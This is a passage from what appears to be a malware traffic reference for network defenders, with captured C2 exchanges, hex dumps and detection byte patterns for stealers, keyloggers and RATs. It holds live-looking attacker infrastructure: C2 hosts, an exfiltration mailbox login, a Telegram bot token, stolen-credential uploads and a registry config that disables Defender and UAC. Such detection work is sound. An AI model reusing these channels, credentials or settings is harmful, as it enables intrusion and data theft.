.....{.A.A.-.}....e....o]...H`..\"......o3...&x+H.k......6x.tM....E.r..H....\tLs\\f.....`.......].h\\.....4.1..V.W%X.D.....3Y....9.u,ch......$i..Ps........J.uN.%...........y...8.QF7....\t.!.........d.8...d;&.....................l.m7....w...1.3......r..\t{.i.....}Lr5h.w..8eB._..w.LJp..9....+..]....T.6-..o..-f7.Q.z;...<..W.%.pA.......Q..d.o..\"\"\".-xD`)..F=..]..*..I.s0...-..P*.1.I..2N....!..\\...5....IB..(O....u..Z......=....}.$.?;7Lt....).\"/Y...o5.$..e....G'U....xrB..PK..........?P............\t...Browsers/UT\n..`.5^`.5^`.5^PK.........q?PX.eS.P...P......Grabber.zipUT....... .......about.logUT...m.4^PK............?P............\t.\t..........Aw...Browsers/UT...`.5^PK...........q?PX.eS.P...P....\t....... .......Grabber.zipUT...n.4^PK...........q?P.ci..:...|....\t....... ....S..screen.jpegUT...m.4^PK....................\n\nHTTP/1.1 200 OK\nDate: Fri, 31 Jan 2020 21:13:48 GMT\nServer: Apache/2.4.29 (Ubuntu)\nContent-Length: 0\nContent-Type: text/html; charset=UTF-8\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parasite1.png \"Parasite stealer\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parasite2.png \"Parasite stealer\")\n\n#### Phoenix Keylogger\n~~~\n220 us2.outbound.mailhostbox.com ESMTP Postfix\nEHLO User-PC\n250-us2.outbound.mailhostbox.com\n250-PIPELINING\n250-SIZE 41648128\n250-VRFY\n250-ETRN\n250-STARTTLS\n250-AUTH PLAIN LOGIN\n250-AUTH=PLAIN LOGIN\n250-ENHANCEDSTATUSCODES\n250-8BITMIME\n250 DSN\nAUTH login dGhiQHRiaC10dy5jb20=\n334 UGFzc3dvcmQ6\nd2Fzc29kZWRvbjIy\n235 2.7.0 Authentication successful\nMAIL FROM:\n250 2.1.0 Ok\nRCPT TO:\n250 2.1.5 Ok\nDATA\n354 End data with .\nMIME-Version: 1.0\nFrom: thb@tbh-tw.com\nTo: thb@tbh-tw.com\nDate: 1 Nov 2019 14:38:03 +0000\nSubject: PX | PSWD | Client Name: admin\nContent-Type: multipart/mixed;\n boundary=--boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0\n\n\n----boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0\nContent-Type: text/plain; charset=us-ascii\nContent-Transfer-Encoding: quoted-printable\n\n|------- Phoenix Keylogger - Passwords -------|=0D=0A+-----------=\n-- Client INFO -------------+=0D=0AIP: 81.17.242.238=0D=0AHWID: 1=\n78BFBFF000506E3=0D=0AOwner Name: USER-PC=0D=0AFull OS Name: Micro=\nsoft Windows 7 Professional =0D=0AOS Platform: Win32NTOS Version:=\n 6.1.7601.65536=0D=0ASystem Boot Mode: Normal=0D=0APhysical Memor=\ny: 3.25 GB Available Of 4.09 GB =0D=0AVirtual Memory: 1.85 GB A=\nvailable Of 2.04 GB =0D=0ADate: 11/1/2019 2:37:59 PM=0D=0A-------=\n----------------------------------=0D=0A\n----boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0\nContent-Type: application/octet-stream; name=\"PXRecoveries | 11/1/2019\n 2:38:00 PM.txt\"\nContent-Transfer-Encoding: base64\nContent-Disposition: attachment\n\n77u/PT09PT09PT09PT09Q2hyb21lPT09PT09PT09PT09PT0NCkhvc3Q6IGh0dHBzOi8v\nd3d3LmZhY2Vib29rLmNvbS8NClVzZXJuYW1lOiBob25leUBwb3QuY29tDQpQYXNzd29y\nZDogaG9uZXlwYXNzMzU2DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KID09\nPT09PT09PT09PU91dExvb2s9PT09PT09PT09PT09PQ0KSG9zdDogMTkyLjE2OC4xLjEN\nClVzZXJuYW1lOiBob25leUBwb3QuY29tDQpQYXNzd29yZDogaG9uZXlwYXNzMzU2DQo9\nPT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KIA==\n----boundary_0_b03405b1-500a-4ac8-8975-daed06a88bd0--\n.\n250 2.0.0 Ok: queued as 7CDF2181E51\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/phoenix.png \"Phoenix\")\n\n#### Plugx\n~~~\nPOST /update?wd=b0b9d49c HTTP/1.1\nAccept: */*\nx-debug: 0\nx-request: 0\nx-content: 61456\nx-storage: 1\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;\nHost: 185.239.226.61:8080\nContent-Length: 0\nConnection: Keep-Alive\nCache-Control: no-cache\n~~~\n~~~\n............?PEOJNOOBAAHDMKNGELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com.................?JJIOHDOBJEIEIBJJELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com.................?DBCGBLOBDMGFEIEMELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com.................?JJIOHDOBJEIEIBJJELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com................=.a.gtld-servers.net..nstld.verisign-grs..]..A.........\t:...Q.............?PEOJNOOBAAHDMKNGELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com................=.a.gtld-servers.net..nstld.verisign-grs..]..2.........\t:...Q.............?DBCGBLOBDMGFEIEMELEADFCKBPAEPIONNCMHLMKBJGILHAGFFKEPDECJBOADPHO?MNBMGLLKAJFIKIPHEGJFOEDDICNBCAHPLOANFMKLPKEJJIOHDGIFNECDHCMBBAG.PKOPNEMJMOLDKIJNIC.bca.udnudfer.com................=.a.gtld-servers.net..nstld.verisign-grs..]..2.........\t:...Q.\n~~~\n~~~\nGET /EF003AAB6425775CD949B40C HTTP/1.1\nAccept: */*\nCookie: QhTbeUW+YzYYsZWz0PQvBvYIgo8=\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: WOUDERFULU.impresstravel.ga\nConnection: Keep-Alive\nCache-Control: no-cache\n\nHTTP/1.1 203 \nServer: nginx\nDate: Tue, 03 Sep 2019 14:37:02 GMT\nContent-Type: text/html;charset=UTF-8\nContent-Length: 660\nConnection: keep-alive\nCache-Control: no-cache\nPragma: no-cache\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\nX-Server: ip-172-31-28-245\nSet-Cookie: JSESSIONID=4618E9008B004BEE8FE5C81AB063A332; Path=/; HttpOnly\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/plugx-1.png \"Plugx\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/plugx-2.png \"PlugxDNS\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/plugx-3.png \"Plugx\")\n\n#### Pony\nFollow tcp stream, not http stream in wireshark\n~~~\nPOST /mlu/forum.php HTTP/1.0\nHost: spausence.com\nAccept: */*\nAccept-Encoding: identity, *;q=0\nAccept-Language: en-US\nContent-Length: 369\nContent-Type: application/octet-stream\nConnection: close\nContent-Encoding: binary\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\n\n..|Rk.. .\"6d0..)/.....Lo..l{;..:.NJT;.G..3P..n...{.i..eLX..j...K.N.......A.\nn.%.....r..&..........J.l.V..of..T..V$... .L...5....6F...9.)......(...\n.(O........*[z\\.....N....=..4..];....L.W......Q...*.S....V.\t7.4.L..v..oi...x..W7....{.....V)...:...1...R..V.......+...]m \n.......B...|D..t.Y.{..............{W.f.._i...i.!..d.C...r.......A.,.z....ta..m..\n5!...w+.....p....!0\n\nHTTP/1.1 200 OK\nServer: nginx/1.10.3\nDate: Thu, 03 Oct 2019 17:17:59 GMT\nContent-Type: text/html\nConnection: close\nX-Powered-By: PHP/5.4.45\n\n..\n.....f>k.X.......\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/pony.png \"Pony\")\n\n#### Pony Loader\n~~~\nPOST /eng/gate.php HTTP/1.0\nHost: www.jicago-jp.com\nAccept: */*\nAccept-Encoding: identity, *;q=0\nContent-Length: 199\nConnection: close\nContent-Type: application/octet-stream\nContent-Encoding: binary\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\n\nHTTP/1.1 200 OK\nDate: Wed, 09 Oct 2019 08:44:06 GMT\nServer: Apache\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\nSTATUS-IMPORT-OK\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/pony-loader.png \"Pony Loader\")\n\n#### Predator Pain Keylogger\n~~~\nFrom: pain@globalfinancel.com\nTo: pain@globalfinancel.com\nDate: 17 Oct 2019 08:04:48 -0700\nSubject: Predator Pain v13 - Server Ran - [XRWJAM272278424]\nContent-Type: text/plain; charset=us-ascii\nContent-Transfer-Encoding: quoted-printable\n\nThis is an email notifying you that XRWJAM272278424 has ran your =\nlogger and emails should be sent to you shortly and at interval c=\nhoosen.=0D=0A =0D=0APredator Logger Details: =0D=0AServer Name: R=\negSvcs.exe=0D=0AKeylogger Enabled: False=0D=0AClipboard-Logger En=\nabled: False=0D=0ATime Logs will be delivered: Every 60 minutes=0D=0A=\n =0D=0AStealers Enabled: True=0D=0ATime Log will be delivered: Av=\nerage 2 to 4 minutes=0D=0A =0D=0ALocal Date and Time: 10/17/2019 =\n8:04:41 AM=0D=0AInstalled Language: en-US=0D=0AOperating System: =\nMicrosoft Windows 7 Professional =0D=0AInternal IP Address: 192.1=\n68.180.170=0D=0AExternal IP Address: =0D=0AInstalled Anti-Virus: =\n=0D=0AInstalled Firewall:=20\n\n.\n250 OK id=1iL7Kv-003iIX-Hl\n\nFrom: pain@globalfinancel.com\nTo: pain@globalfinancel.com\nDate: 17 Oct 2019 08:05:04 -0700\nSubject: Predator Pain v13|Stealer Log - [XRWJAM272278424]\nContent-Type: text/plain; charset=us-ascii\nContent-Transfer-Encoding: quoted-printable\n\n ********************************=\n**************=0D=0A Operati=\nng System Intel Recovery=0D=0A **=\n********************************************=0D=0ACPU Name: XRWJA=\nM272278424=0D=0ALocal Date and Time: 10/17/2019 8:04:55 AM=0D=0AI=\nnstalled Language: en-US=0D=0ANet Version: 4.0.30319.42000=0D=0AO=\nperating System Platform: Win32NT=0D=0AOperating System Version: =\n6.1.7601.65536=0D=0AOperating System: Microsoft Windows 7 Profess=\nional =0D=0AInternal IP Address: 192.168.180.170=0D=0AExternal IP=\n Address: =0D=0AInstalled Anti-Virus: =0D=0AInstalled Firewall: =0D=0A=\n ********************************=\n**************=0D=0A WEB Bro=\nwser Password Recovery=0D=0A ****=\n******************************************=0D=0A=0D=0A =\n *******************************************=\n***=0D=0A Mail Messenger Passw=\nord Recovery=0D=0A **************=\n********************************=0D=0A=0D=0A =\n **********************************************=0D=0A =\n Internet Download Manager Reco=\nvery=0D=0A **********************=\n************************=0D=0A **=\n********************************************=0D=0A =\n Jdownloader Password Recovery=0D=0A =\n ***************************************=\n*******\n\n.\n250 OK id=1iL7LE-003ina-5V\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/predatorpain.png \"Predator Pain Keylogger\")\n\n#### Predator the Thief\n~~~\nPOST /api/check.get HTTP/1.1\nContent-Type: text/html\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.906.121 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nHost: 95.215.205.56\nContent-Length: 0\nConnection: Keep-Alive\nCache-Control: no-cache\n\nHTTP/1.1 200 OK\nDate: Wed, 09 Oct 2019 20:05:42 GMT\nServer: Apache\nSet-Cookie: SID_INTERFICE=4c616d7fffe95fe8fc2f4f46d272c8a0412c1404; expires=Thu, 10-Oct-2019 20:05:42 GMT; Max-Age=86400; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nContent-Length: 132\nKeep-Alive: timeout=10, max=100\nConnection: Keep-Alive\nContent-Type: text/plain; charset=utf-8\n\nnr8uEQylGUpuY0Qjyde/Fn3TGzRg6JFXvSXGhXxBL0Ls2eMYLaWSpJIvp6bRuCqmkclDgfyfYtc7/hQGxqKlJiPdCQ0v/JyN12lNiho7IjBLW3VB02orxGMXTr04WaAQz73q\n\nHTTP/1.1 200 OK\nDate: Wed, 09 Oct 2019 20:05:42 GMT\nServer: Apache\nSet-Cookie: SID_INTERFICE=4c616d7fffe95fe8fc2f4f46d272c8a0412c1404; expires=Thu, 10-Oct-2019 20:05:42 GMT; Max-Age=86400; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nContent-Length: 132\nKeep-Alive: timeout=10, max=100\nConnection: Keep-Alive\nContent-Type: text/plain; charset=utf-8\n\nnr8uEQylGUpuY0Qjyde/Fn3TGzRg6JFXvSXGhXxBL0Ls2eMYLaWSpJIvp6bRuCqmkclDgfyfYtc7/hQGxqKlJiPdCQ0v/JyN12lNiho7IjBLW3VB02orxGMXTr04WaAQz73qPOST /api/gate.get?p1=2&p2=5&p3=0&p4=2&p5=0&p6=0&p7=0&p8=0&p9=0&p10=udh8T1P6VQh1ZF9DgIniQjWRSWBTqqYq5k2u HTTP/1.1\nContent-Type: multipart/form-data; boundary=---------------------------228\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.906.121 Safari/537.36\nHost: 95.215.205.56\nContent-Length: 6028\nConnection: Keep-Alive\nCache-Control: no-cache\nCookie: SID_INTERFICE=4c616d7fffe95fe8fc2f4f46d272c8a0412c1404\n\n-----------------------------228\nContent-Disposition: form-data; name=\"file\"; filename=\"s7q3q0u1v7q3q0u1v7.zip\"\nContent-Type: application/octet-stream\n\nPK..........IO................Outlook/UT\n...K.].K.].K.]PK..........IOo...?...F.......Outlook/Outlook.txtUT\n...K.].K.].K.]s.M...R...K.t(./.K..e..\nH,.../J.......f@.`...+.CK#=C3.=C=C../..PK..........IO................General/UT\n...K.].K.].K.]PK..........IO................Cookies/UT\n...K.].K.].K.]PK..........IO................History/UT\n...K.].K.].K.]PK..........IO................Other/UT\n...K.].K.].K.]PK..........IOa.qZ............History/Chrome_0.txtUT\n...K.].K.].K.].V[k.8.~..?.............B...>..,{D4.V....?..e..4M.M...`....s...O....3..b%....0.\n7.'_.;s6.H}6.kZ.Fz........i...aZ...\".\".v.P.x>PR.[.D...$Q...\"...%\nf...Y.[.V.......G.*\"...Ig..Y...k=}..}..U....@....T..n.-)7Z.Yt..%...$.P.vQ....p.z..&..t...P[...w...T....6A..!k...:...V...Fp.....-.a.....7......_.X...E../;..T8..7.I..)Y..(..,....)JP..........nf..g..E.\\..(..@..XQ.l....\".e..a.X .H.?*.\".a.F9`..~zrzr..\t.M......\n.\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/predator.png \"Predator\")\n\n#### Proyecto (aka Nemours) RAT\n~~~\n0|New - 25-10-19/21:41|United States|USER-PC - admin|Windows 7 Professional - 32 Bits / Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz / 4 / / 0|US|0|192.168.100.60|0 Cap.|oolkth|9090|OFF| - 0 / || Tiene Capturas de: |New - |||No Available\n13|Program Manager|OFF|OFF - 0 / ||\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/proyecto.png \"Proyecto\")\n\n#### Pyrogenic\nflah on \"53 E1 6D D3 9E EE 45 D4\" on iniial connection, 175 bytes\n~~~\n00000000 53 S\n00000001 e1 6d d3 9e ee 45 d4 ad 26 96 67 86 36 fb f7 cc .m...E.. &.g.6...\n00000011 3f 15 13 b7 cf 5e 99 ac dc 9d e6 36 cd 61 bd 91 ?....^.. ...6.a..\n00000021 37 5c db a0 15 ec f4 5a 9a 63 96 7f 2b e6 b3 3c 7\\.....Z .c..+..<\n00000031 96 a9 aa fe d6 37 6d f5 1d 57 8f 26 f1 03 a4 7a .....7m. .W.&...z\n00000041 7b d9 5f 01 8c 5e 87 c5 de 80 a2 52 15 24 e0 73 {._..^.. ...R.$.s\n00000051 51 70 b4 6f 60 7c a8 4c df 36 ac df 96 b3 18 b5 Qp.o`|.L .6......\n00000061 54 37 74 9b d1 60 06 f1 46 b2 8f e2 23 f2 58 80 T7t..`.. F...#.X.\n00000071 de d9 8d d9 10 35 91 7f d9 74 4b 6e 05 4c 13 9f .....5.. .tKn.L..\n00000081 68 85 65 d0 bb f6 67 0c 78 ae 12 b6 ab 89 90 14 h.e...g. x.......\n00000091 e0 47 c5 56 c9 e0 0f 17 73 95 ee 30 08 fa 0e 47 .G.V.... s..0...G\n000000A1 cd ec dd 72 db e7 ff bf b9 57 b3 61 c4 cb 4c ...r.... .W.a..L\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/pyrogenic.png \"Pyrogenic\")\n\n#### Qbot\nusually url is /t3\n~~~\nPOST /t3 HTTP/1.1\nAccept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\nHost: 174.48.72.160\nContent-Length: 215\nCache-Control: no-cache\n\nycgizbarun=8e5ygoO+WS2h/ypd2ZEi8nHeEKPFyrdKrXgLyQd6Gi76j4KxXuMEm2K/lEHrTJqqWdDWXZQWcLyTbSnECgNFerjMjb9ittXV+rg/yqpLMLtOWYw6pCz2nDkPbGnUW3Z61/yZoSoh9zdJzkpTmYMCloxmblZ9Eos4QZHsiMecjlcmNjwU1D/9ShQ6cGKSJxHNVT2lNGCykNU=\n\nHTTP/1.1 200 OK\nServer: nginx/1.9.12\nContent-Length: 41\n\nParseHttpResponse() failed pCurlResp=NULL\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qbot.png \"Qbot Qakbot\")\n\n#### Qealler RAT\n~~~\n........t.]{\"serverPath\":\"C:\\\\Users\\\\Jonathan\\\\Desktop\\\\PO6671.jar\",\"securityRetry\":20,\"vbox\":false,\"serverVersion\":\"v2.0.0\",\"mainPath\":\"C:\\\\Users\\\\Jonathan\\\\QkpCj\",\"nickName\":\"14TH TWETWE APRIL\",\"vmware\":false,\"encryptKey\":\"NnKHsguoUsbJwLwumvSXFoiWR\",\"operatingSystem\":{\"osDefaultArch\":\"amd64\",\"country\":{\"code\":\"us\",\"name\":\"United States\"},\"icon\":\"windows7\",\"admin\":true,\"language\":\"English (United States)\",\"type\":1,\"processor\":2,\"osDefaultName\":\"Windows 7\",\"computerUser\":\"Jonathan\",\"javaArchitecture\":\"amd64\",\"computerName\":\"JONATHAN-PC\",\"name\":\"Windows 7 Professional\",\"osDefaultVersion\":\"6.1\",\"jreVersion\":\"1.8.0\",\"architecture\":\"amd64\",\"ram\":\"3 GB\"},\"uuid\":\"7094850e-92de-4eed-b492-65d966bc00b5lumteifxDUDU\",\"command\":1,\"network\":[{\"delay\":2,\"port\":4424,\"dns\":\"marketingsiamgrains.zapto.org\"}],\"jrePath\":\"C:\\\\Users\\\\Jonathan\\\\Oracle\\\\bin\\\\javaw.exe\",\"userTitle\":\"Jonathan@JONATHAN-PC\",\"security\":[{\"process\":[\"UserAccountControlSettings.exe\"],\"code\":\"user-account-control\",\"reg\":[{\"value\":\"\\\"ConsentPromptBehaviorAdmin\\\"=dword:00000000\\r\\n\\\"ConsentPromptBehaviorUser\\\"=dword:00000000\\r\\n\\\"EnableLUA\\\"=dword:00000000\\r\\n\\\"PromptOnSecureDesktop\\\"=dword:00000000\\r\\n\",\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\",\"valuesCommand\":[]}],\"name\":{\"en\":\"User Account Control\"}},{\"process\":[\"Taskmgr.exe\"],\"code\":\"task-manager\",\"reg\":[{\"value\":\"\\\"DisableTaskMgr\\\"=dword:00000002\\r\\n\",\"key\":\"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\",\"valuesCommand\":[{\"name\":\"DisableTaskMgr\",\"valueCommand\":\"2\",\"valueCommandType\":\"REG_DWORD\",\"key\":\"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\"}]}],\"name\":{\"en\":\"Task Manager\"}},{\"process\":[\"procexp.exe\"],\"code\":\"msconfig\",\"name\":{\"en\":\"MsConfig\"}},{\"process\":[\"MSASCuiL.exe\",\"MSASCui.exe\",\"MsMpEng.exe\",\"MpUXSrv.exe\",\"MpCmdRun.exe\",\"NisSrv.exe\",\"ConfigSecurityPolicy.exe\"],\"code\":\"windows-defender\",\"reg\":[{\"value\":\"\\\"DisableAntiSpyware\\\"=dword:00000001\\r\\n\",\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\",\"valuesCommand\":[{\"name\":\"DisableAntiSpyware\",\"valueCommand\":\"1\",\"valueCommandType\":\"REG_DWORD\",\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\"}]},{\"value\":\"\\\"DisableBehaviorMonitoring\\\"=dword:00000001\\r\\n\\\"DisableOnAccessProtection\\\"=dword:00000001\\r\\n\\\"DisableScanOnRealtimeEnable\\\"=dword:00000001\\r\\n\",\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\",\"valuesCommand\":[{\"name\":\"DisableBehaviorMonitoring\",\"valueCommand\":\"1\",\"valueCommandType\":\"REG_DWORD\",\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\"},{\"name\":\"DisableOnAccessProtection\",\"valueCommand\":\"1\",\"valueCommandType\":\"REG_DWORD\",\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\"},{\"name\":\"DisableScanOnRealtimeEnable\",\"valueCommand\":\"1\",\"valueCommandType\":\"REG_DWORD\",\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\"}]}],\"name\":{\"en\":\"Windows Defender\"}}],\"installDate\":{\"daysRunning\":0,\"lastModified\":1586920462000},\"installation\":{\"jarName\":\"vrpiI\",\"moduleFolder\":\"fZrJY\",\"moduleEntry\":\"LmqeMOCMZKDnCAMInhONhNssACvKupnYNmRGqciHQTmDqMeajNLIKvjeiGOkSFQDkiMQfSaBSp/atbrMtgqBWJtmbTArraiRtMHwMQqwICMrbnBkjtHHUsULWJhUZZJAlRSSnSZvWFv/hidBDxdVcfNQOjMqVwjrrjqXirgxqjnS.BlDbZGWeXeYlqIdKpxKaROeDvagYjATCOaTNXXRK\",\"uniqueIDFile\":\".ntusernt.ini\",\"delay\":2,\"jreFolder\":\"Oracle\",\"active\":true,\"mainFolder\":\"QkpCj\",\"moduleExtension\":\"Jus.txt\",\"jarExtension\":\"class.txt\",\"jarRegistry\":\"eHgASPs\"},\"localIp\":\"192.168.100.101\"}t..{\"command\":104}t..{\"command\":114}t..{\"command\":115}t.N{\"title\":\"\\r\\n[Administrator: Command Prompt - dump 2888]\\r\\n\",\"command\":115}t.H{\"time\":{\"hour\":0,\"minute\":0,\"second\":0},\"command\":114,\"sleeping\":false}t.A{\"title\":\"\\r\\n[Administrator: Command Prompt]\\r\\n\",\"command\":115}t.,{\"title\":\"\\r\\n[TCPHound]\\r\\n\",\"command\":115}t. {\"moduleId\":\"008\",\"command\":108}t.X{\"title\":\"\\r\\n[MegaDumper 1.0 by CodeCracker / SnD (Not Responding)]\\r\\n\",\"command\":115}t.G{\"title\":\"\\r\\n[MegaDumper 1.0 by CodeCracker / SnD]\\r\\n\",\"command\":115}t. {\"moduleId\":\"008\",\"command\":108}t.H{\"time\":{\"hour\":0,\"minute\":0,\"second\":0},\"command\":114,\"sleeping\":false}t.,{\"title\":\"\\r\\n[TCPHound]\\r\\n\",\"command\":115}t.N{\"title\":\"\\r\\n[Administrator: Command Prompt - dump 2888]\\r\\n\",\"command\":115}t..{\"command\":111}\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qealler.png \"Qealler\")\n\n#### Quasar RAT\nFlag on \"40 00 00 00\" pattern, 68 data bytes on first packet\n~~~\n00000000 40 00 00 00 3e 83 58 08 ad d1 05 8d 77 20 53 1f @...>.X. ....w S.\n00000010 dc 2e e8 99 0a f3 f1 bb 3a 8c c2 a1 9d 72 4a 69 ........ :....rJi\n00000020 e6 60 97 da 1e 76 87 16 91 f2 1b c4 f4 89 f9 8a .`...v.. ........\n00000030 20 5b 19 e5 7c ae ed f1 b4 5a d2 ce 5f 86 17 20 [..|... .Z.._.. \n00000040 c6 b3 03 8c ....\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/quasar.png \"Quasar\")\n\n#### Qudox\n~~~\nGET /gate.php?check HTTP/1.1\nHost: 195.2.92.64\n\nHTTP/1.1 200 OK\nDate: Fri, 04 Sep 2020 13:08:34 GMT\nServer: Apache/2.4.25 (Debian)\nContent-Length: 12\nContent-Type: text/html; charset=UTF-8\n\nby+B+dC9UQ==\n\nGET /gate.php HTTP/1.1\nHost: 195.2.92.64\nContent-Length: 76\n\nTBOs3enZOi2/1kVNZdn9bAt1EnPmqL4g9GBGU95XoNzQo6hiYel7j0rkpapVu45CkORs54FJtg==\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qudox.png \"Qudox\")\n\n#### Qulab Clipper\n~~~\nGET /bot873737212:AAFatKVhb76Tb7yoLv3dCtDO9sgKAsUV_gg/getMe HTTP/1.1\nUser-Agent: AutoIt\nHost: api.telegram.org\nCache-Control: no-cache\n\nHTTP/1.1 200 OK\nServer: nginx/1.16.1\nDate: Fri, 01 Nov 2019 18:11:04 GMT\nContent-Type: application/json\nContent-Length: 124\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: GET, POST, OPTIONS\nAccess-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection\n\n{\"ok\":true,\"result\":{\"id\":873737212,\"is_bot\":true,\"first_name\":\"MASADCLIPPERANDSTEALER\",\"username\":\"aliclipperstealer_bot\"}}\n~~~\n~~~\nPOST /bot873737212:AAFatKVhb76Tb7yoLv3dCtDO9sgKAsUV_gg/sendDocument HTTP/1.1\nConnection: Keep-Alive\nContent-Type: multipart/form-data; boundary=----WinHttpBoundaryLine_56206.90110\nAccept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,*/*;q=0.5\nAccept-Charset: utf-8;q=0.7\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) WinHttp/1.6.4.0 (WinHTTP/5.1) like Gecko\nContent-Length: 55058\nHost: api.telegram.org\n\n------WinHttpBoundaryLine_56206.90110\nContent-Disposition: form-data; name=\"chat_id\"\n\n880414267\n------WinHttpBoundaryLine_56206.90110\nContent-Disposition: form-data; name=\"document\"; filename=\"ENU_6887FE9730D2535E9D41.7z\"\nContent-Type: application/octet-stream\n\n7z..'...E..P........$.......aO...5...]....C.k\".0DL.p1SC\t...UM..,.j\n.M.%...}...)..p.d...7.+..w..,..\\....w.0z9:6....6...94..._...r..Xu.,........\n.<&:e...S.4.....k._4jn.\n.....)+/q.*?..2 ..j..tj.Y....M.o...$1...H.....r..*%.J.A......Y..2.......0..+.......uz..../O......48.7........&.A...WT{...v.W.\\.o.....cax..H.Y...A....<4<.8|........p0E....f..W.X.....Z..\t...k5..0 .1t..r.1L.p.Y,.3.....H.f......0.$....JGv...z..L'....'...&<.&m....@rS...r......u...6.#.7z...h.B..._.S.....z..F..q...].V3`w1/...._f(m...$....W<....L&Zv.a......HR.'.r...H'J(.f.......&_?..8.EL...#...j..(....._.\\Vw\n....d%{.$MR`e!.]..$\n...-.ct...~Za@YsbNNG...~.R......b..'..oRW3.L..N..&.Q4.\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qulab.png \"Qulab\")\n\n#### RaaLoader aka 